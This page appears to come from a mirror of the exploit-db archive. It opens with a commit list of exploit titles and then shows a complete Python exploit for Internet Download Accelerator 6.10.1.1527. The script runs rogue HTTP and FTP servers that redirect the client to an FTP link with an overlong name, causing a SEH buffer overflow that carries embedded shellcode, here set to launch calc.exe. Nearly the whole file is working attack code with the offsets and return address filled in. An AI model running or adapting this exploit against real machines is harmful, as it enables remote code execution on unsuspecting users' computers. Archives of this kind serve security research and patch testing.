bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/remote/40984.py
Offensive Security bac881f89a DB: 2017-01-03 
3 new exploits

QNAP NAS Devices - Heap Overflow

Castle Rock Computing SNMPc 7.0.19 - Community String Stack Based Buffer Overflow

Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)

PHPFanBase 2.x - (protection.php) Remote File Inclusion
PHPFanBase 2.x - 'protection.php' Remote File Inclusion

DigiAffiliate 1.4 - (visu_user.asp id) SQL Injection
DigiAffiliate 1.4 - 'id' Parameter SQL Injection

ExoPHPDesk 1.2.1 - (faq.php) SQL Injection
ExoPHPDesk 1.2.1 - 'faq.php' SQL Injection

MiniGal b13 - (image backdoor) Remote Code Execution
MiniGal b13 - Remote Code Execution
PHP Auto Listings - 'moreinfo.php pg' SQL Injection
Pre Simple CMS - SQL Injection (Authentication Bypass)
PHP Auto Listings - 'pg' Parameter SQL Injection
Pre Simple CMS - Authentication Bypass

Harlandscripts drinks - (recid) SQL Injection
Harlandscripts drinks - 'recid' Parameter SQL Injection

Mole Group Taxi Calc Dist Script - (Authentication Bypass) SQL Injection
Mole Group Taxi Calc Dist Script - Authentication Bypass

DevelopItEasy Membership System 1.3 - (Authentication Bypass) SQL Injection
DevelopItEasy Membership System 1.3 - Authentication Bypass

NICE FAQ Script - (Authentication Bypass) SQL Injection
NICE FAQ Script - Authentication Bypass

SoftComplex PHP Image Gallery 1.0 - (Authentication Bypass) SQL Injection
SoftComplex PHP Image Gallery 1.0 - Authentication Bypass
DELTAScripts PHP Classifieds 7.5 - (Authentication Bypass) SQL Injection
DELTAScripts PHP Links 1.3 - (Authentication Bypass) SQL Injection
DELTAScripts PHP Shop 1.0 - (Authentication Bypass) SQL Injection
SoftComplex PHP Image Gallery - (ctg) SQL Injection
DELTAScripts PHP Classifieds 7.5 - Authentication Bypass
DELTAScripts PHP Links 1.3 - Authentication Bypass
DELTAScripts PHP Shop 1.0 - Authentication Bypass
SoftComplex PHP Image Gallery - 'ctg' Parameter SQL Injection
TurnkeyForms Business Survey Pro 1.0 - 'id' SQL Injection
Mole Group Pizza - (manufacturers_id) Script SQL Injection
TurnkeyForms Business Survey Pro 1.0 - 'id' Parameter SQL Injection
Mole Group Pizza - 'manufacturers_id' Parameter SQL Injection
E-topbiz Online Store 1 - (Authentication Bypass) SQL Injection
PHP Auto Listings Script - (Authentication Bypass) SQL Injection
Mole Group Rental Script - (Authentication Bypass) SQL Injection
MyioSoft Ajax Portal 3.0 - (Authentication Bypass) SQL Injection
MyioSoft EasyBookMarker - (Authentication Bypass) SQL Injection
MyioSoft EasyCalendar - (Authentication Bypass) SQL Injection
E-topbiz Online Store 1 - Authentication Bypass
PHP Auto Listings Script - Authentication Bypass
Mole Group Rental Script - Authentication Bypass
MyioSoft Ajax Portal 3.0 - Authentication Bypass
MyioSoft EasyBookMarker 4.0 - Authentication Bypass
MyioSoft EasyCalendar - Authentication Bypass

E-topbiz Online Store 1 - 'cat_id' SQL Injection
E-topbiz Online Store 1 - 'cat_id' Parameter SQL Injection

Myiosoft EasyBookMarker 4 - (Parent) SQL Injection
Myiosoft EasyBookMarker 4 - 'Parent' Parameter SQL Injection
Enthusiast 3.1.4 - (show_joined.php path) Remote File Inclusion
V3 Chat Profiles/Dating Script 3.0.2 - (Authentication Bypass) SQL Injection
Enthusiast 3.1.4 - 'show_joined.php' Remote File Inclusion
V3 Chat Profiles/Dating Script 3.0.2 - Authentication Bypass
DigiAffiliate 1.4 - (Authentication Bypass) SQL Injection
Mole Group Airline Ticket Script - (Authentication Bypass) SQL Injection
DigiAffiliate 1.4 - Authentication Bypass
Mole Group Airline Ticket Script - Authentication Bypass
ExoPHPDesk 1.2 Final - (Authentication Bypass) SQL Injection
ZEEMATRI 3.0 - (bannerclick.php adid) SQL Injection
ExoPHPDesk 1.2 Final - Authentication Bypass
ZEEMATRI 3.0 - 'adid' Parameter SQL Injection

Joomla! Component com_books - (book_id) SQL Injection
Joomla! Component com_books - 'book_id' Parameter SQL Injection

Joomla! / Mambo Component 'com_catalogproduction' - 'id' SQL Injection
Joomla! / Mambo Component com_catalogproduction - 'id' Parameter SQL Injection

PozScripts Business Directory Script - 'cid' SQL Injection
PozScripts Business Directory Script - 'cid' Parameter SQL Injection
Alstrasoft Web Host Directory - (Authentication Bypass) SQL Injection
Quick Poll Script - 'code.php id' SQL Injection
Alstrasoft Web Host Directory - Authentication Bypass
Quick Poll Script - 'id' Parameter SQL Injection

Bankoi Webhost Panel 1.20 - (Authentication Bypass) SQL Injection
Bankoi Webhost Panel 1.20 - Authentication Bypass
Minigal b13 - 'index.php list' Remote File Disclosure
yahoo answers - 'id' SQL Injection
Minigal b13 - Remote File Disclosure
yahoo answers - 'id' Parameter SQL Injection

PHPstore Wholesale - 'track.php?id' SQL Injection
PHPstore Wholesale - 'id' Parameter SQL Injection

E-topbiz ADManager 4 - (group) Blind SQL Injection
E-topbiz ADManager 4 - 'group' Parameter Blind SQL Injection
PHPfan 3.3.4 - (init.php includepath) Remote File Inclusion
Jadu Galaxies - 'categoryId' Blind SQL Injection
PHPfan 3.3.4 - 'init.php' Remote File Inclusion
Jadu Galaxies - 'categoryId' Parameter Blind SQL Injection

MemHT Portal 4.0.1 - (avatar) Remote Code Execution
MemHT Portal 4.0.1 - Remote Code Execution

MemHT Portal 4.0.1 - (pvtmsg) Delete All Private Messages Exploit
MemHT Portal 4.0.1 - Delete All Private Messages Exploit

MyioSoft Ajax Portal 3.0 - (page) SQL Injection
MyioSoft Ajax Portal 3.0 - 'page' Parameter SQL Injection

X10media Mp3 Search Engine < 1.6.2 Admin Access
X10media Mp3 Search Engine < 1.6.2 - Admin Access

Arab Portal 2.2 - (Authentication Bypass) SQL Injection
Arab Portal 2.2 - Authentication Bypass

Arab Portal 2.x - (forum.php qc) SQL Injection
Arab Portal 2.x - 'forum.php' SQL Injection

Arab Portal 2.2 - (mod.php module) Local File Inclusion
Arab Portal 2.2 - 'mod.php' Local File Inclusion

Collabtive - SQL Injection
Collabtive 0.65 - SQL Injection
All Enthusiast ReviewPost PHP Pro 2.5 - showproduct.php SQL Injection
All Enthusiast ReviewPost PHP Pro 2.5 - showcat.php SQL Injection
All Enthusiast ReviewPost PHP Pro 2.5 - 'showproduct.php' SQL Injection
All Enthusiast ReviewPost PHP Pro 2.5 - 'showcat.php' SQL Injection

All Enthusiast PhotoPost PHP Pro 5.0 - adm-photo.php Arbitrary Image Manipulation
All Enthusiast PhotoPost PHP Pro 5.0 - 'adm-photo.php' Arbitrary Image Manipulation

Collabtive 1.0 - (manageuser.php task Parameter) SQL Injection
Collabtive 1.0 - 'manageuser.php' SQL Injection

Arab Portal 2.0 - Link.php SQL Injection
Arab Portal 2.0 - 'Link.php' SQL Injection
Arab Portal System 2.0 - online.php title Parameter Cross-Site Scripting
Arab Portal System 2.0 - download.php title Parameter Cross-Site Scripting
Arab Portal 2.0 - 'online.php' Cross-Site Scripting
Arab Portal 2.0 - 'download.php' Cross-Site Scripting

ExoPHPDesk 1.2 - Pipe.php Remote File Inclusion
ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion

Collabtive 1.1 - (managetimetracker.php id Parameter) SQL Injection
Collabtive 1.1 - 'managetimetracker.php' SQL Injection

Zeeways Shaadi Clone 2.0 - 'admin/home.php' Authentication Bypass
Zeeways Shaadi Clone 2.0 - Authentication Bypass

PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution
2017-01-03 05:01:17 +00:00

161 lines
6 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/python
#
# Exploit Title: IDA 6.10.1.1527 FTP SEH Universal exploit.
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Youtube : https://www.youtube.com/user/cutehack3r
# Date: Jan 2, 2017
# Vendor Homepage: http://westbyte.com/
# Software Link: http://westbyte.com/index.phtml?page=support&tmp=1&lng=English&product=Internet%20Download%20Accelerator.
# Version: 6.10.1.1527
# Tested on: IDA 6.10.1.1527 Free Version - Windows 7 SP1 - Windows 10.
# --------------
# Internet download accelerator suffers from a BOF when an FTP Download of file with
# long name fails.
# --------------
# To Exploit this issue:
# 1- Run HTTP server that will redirect to the FTP file with long name.
# 2- The ftp server will answer to the commands sent then will open a data connection.
# 3- The script will send an empty file list and close the connection to trigger the BOF condition.
# 5- Happy new year :D.
import SocketServer
import threading
# IP to listen to, needed to construct PASV response so 0.0.0.0 is not gonna work.
ip = "192.168.1.100"
ipParts = ip.split(".")
PasvResp = "("+ ipParts[0]+ "," + ipParts[1]+ "," + ipParts[2] + "," + ipParts[3] + ",151,130)"
# Run Calc.exe
buf=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
class HTTPHandler(SocketServer.BaseRequestHandler):
"""
The request handler class for our HTTP server.
This is just so we don't have to provide a suspicious FTP link with long name.
"""
def handle(self):
# self.request is the TCP socket connected to the client
self.data = self.request.recv(1024).strip()
print "[*] Recieved HTTP Request"
print "[*] Sending Redirction To FTP"
# just send back the same data, but upper-cased
# SEH Offset 336 - 1056 bytes for the payload - 0x10011b53 unzip32.dll ppr 0x0c
payload = "ftp://192.168.1.100/"+ 'A' * 336 + "\xeb\x06\x90\x90" + "\x53\x1b\x01\x10" + buf + "B" * (1056 - len(buf))
self.request.sendall("HTTP/1.1 302 Found\r\n" +
"Host: Server\r\nConnection: close\r\nLocation: "+
payload+
"\r\nContent-type: text/html; charset=UTF-8\r\n\r\n")
print "[*] Redirection Sent..."
class FTPHandler(SocketServer.BaseRequestHandler):
"""
The request handler class for our FTP server.
This will work normally and open a data connection with IDA.
"""
def handle(self):
# User Command
self.request.sendall("220 Nasty FTP Server Ready\r\n")
User = self.request.recv(1024).strip()
print "[*] Recieved User Command: " + User
self.request.sendall("331 User name okay, need password\r\n")
# PASS Command
Pass = self.request.recv(1024).strip()
print "[*] Recieved PASS Command: " + Pass
self.request.sendall("230-Password accepted.\r\n230 User logged in.\r\n")
# SYST Command
Syst = self.request.recv(1024).strip()
print "[*] Recieved SYST Command: " + Syst
self.request.sendall("215 UNIX Type: L8\r\n")
# TYPE Command
Type = self.request.recv(1024).strip()
print "[*] Recieved Type Command: " + Type
self.request.sendall("200 Type set to I\r\n")
# REST command
Rest = self.request.recv(1024).strip()
print "[*] Recieved Rest Command: " + Rest
self.request.sendall("200 OK\r\n")
# CWD command
Cwd = self.request.recv(2048).strip()
print "[*] Recieved CWD Command: " + Cwd
self.request.sendall("250 CWD Command successful\r\n")
# PASV command.
Pasv = self.request.recv(1024).strip()
print "[*] Recieved PASV Command: " + Pasv
self.request.sendall("227 Entering Passive Mode " + PasvResp + "\r\n")
#LIST
List = self.request.recv(1024).strip()
print "[*] Recieved LIST Command: " + List
self.request.sendall("150 Here comes the directory listing.\r\n226 Directory send ok.\r\n")
class FTPDataHandler(SocketServer.BaseRequestHandler):
"""
The request handler class for our FTP Data connection.
This will send useless response and close the connection to trigger the error.
"""
def handle(self):
# self.request is the TCP socket connected to the client
print "[*] Recieved FTP-Data Request"
print "[*] Sending Empty List"
# just send back the same data, but upper-cased
self.request.sendall("total 0\r\n\r\n")
self.request.close()
if __name__ == "__main__":
HOST, PORT = ip, 8000
SocketServer.TCPServer.allow_reuse_address = True
print "[*] Starting the HTTP Server."
# Create the server, binding to localhost on port 8000
HTTPServer = SocketServer.TCPServer((HOST, PORT), HTTPHandler)
# Running the http server (using a thread so we can continue and listen for FTP and FTP-Data).
HTTPThread = threading.Thread(target=HTTPServer.serve_forever)
HTTPThread.daemon = True
HTTPThread.start()
print "[*] Starting the FTP Server."
# Running the FTP server.
FTPServer = SocketServer.TCPServer((HOST, 21), FTPHandler)
# Running the FTP server thread.
FTPThread = threading.Thread(target=FTPServer.serve_forever)
FTPThread.daemon = True
FTPThread.start()
print "[*] Opening the data connection."
# Opening the FTP data connection - DON'T CHANGE THE PORT.
FTPData = SocketServer.TCPServer((HOST, 38786), FTPHandler)
# Running the FTP Data connection Thread.
DataThread = threading.Thread(target=FTPData.serve_forever)
DataThread.daemon = True
DataThread.start()
print "[*] Listening for FTP Data."
# Making the main thread wait.
print "[*] To exit the script please press any key at any time."
raw_input()
Reference in a new issue View git blame Copy permalink